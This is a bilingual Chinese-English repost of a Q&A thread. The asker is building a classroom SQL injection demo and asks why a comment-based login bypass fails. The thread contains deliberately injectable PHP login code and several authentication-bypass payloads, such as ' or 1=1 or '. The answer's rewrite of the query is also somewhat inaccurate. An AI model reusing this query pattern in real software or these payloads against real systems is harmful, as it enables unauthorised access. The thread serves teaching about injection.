SQL 注入测试 - mysql_query [英] SQL injection test - mysql_query

问题描述

我正在为我的同学创建一个测试项目，以展示带有未检查变量的 php 代码是多么危险.我正在使用已弃用的 mysql_* 函数和一个带有 2 个表的简单数据库:

I'm creating a test project for my classmates to show how php code with unchecked variables is dangerous. I'm using the deprecated mysql_* function and a simple database with 2 tables:

users  
data

在用户中我只有管理员用户.

and in the users I have just the admin user.

我创建了一个简单的 html 表单:

I have created a simple html form:

    <form action="login" method="POST">
    username: <input type="text" name="username">
    password: <input type="text" name="password">
<input type="submit" value="login">
    </form>

和 login.php 页面简单地获取帖子数据并像这样构建查询:

and the login.php page simply get the post data and build the query like this:

$uname = strtolower(trim($_POST['username']));
    $passw = strtolower(trim($_POST['password']));

$result = mysql_query("
    SELECT *
    FROM users
    WHERE username='".$uname."' and password=MD5('".$passw."')"
    );
if(mysql_num_rows($result) != 1){
        echo "Non valid";
    }else{
        echo "Logged in";
    }

这是我在用户名字段中的输入:

and this is my input on username field:

' or 1=1 -- 

应该产生如下查询:

SELECT * FROM users WHERE username='' or 1=1 -- ' and password=MD5('') 

如果我在 SequelPro 或 PhpMyAdmin 上运行这个查询，查询会给我表的第一行，所以它可以工作.但是如果我提交表单，结果是 Not valid.

if I run this query on SequelPro or PhpMyAdmin the query give me the first row of the table so it works. But if I submit the form the result is Not valid.

我也尝试在此输入中使用密码字段:

I tried also to use the password field with this input:

') or 1=1 -- 

这是生成的查询:

SELECT * FROM users WHERE username='' and password=MD5('') or 1=1 -- ') 

但结果是一样的，它适用于 SequelPro，但不适用于表单.

but the result is the same, it works on SequelPro but not in the form.

我认为 mysql_query 函数不会识别 -- 注释.我说得对吗?
我做错了什么?

I think that the mysql_query function will not recognize the -- comment. Am I right?
What I'm doing wrong?

推荐答案

在用户名字段试试这个:

try this in username field :

' or 1=1 or '

并输入您想要的密码.不要忘记 ' 之后的空格.它把你的代码变成这样:

and enter password whatever you want. don't forget about space after ' s. it turns your code like that:

mysql_query("select * from users where username='' or 1=1 or '' and 
password=".md5('$pass'))

它总是返回真.

它必须工作，如果没有，这样做:

it MUST work, if it doesnt, do this :

echo "
    SELECT *
    FROM users
    WHERE username='".$uname."' and password=MD5('".$passw."')";

并将结果作为评论发布给我，也许我可以帮助您

and post the result as comment for me , maybe I could help you

这篇关于SQL 注入测试 - mysql_query的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！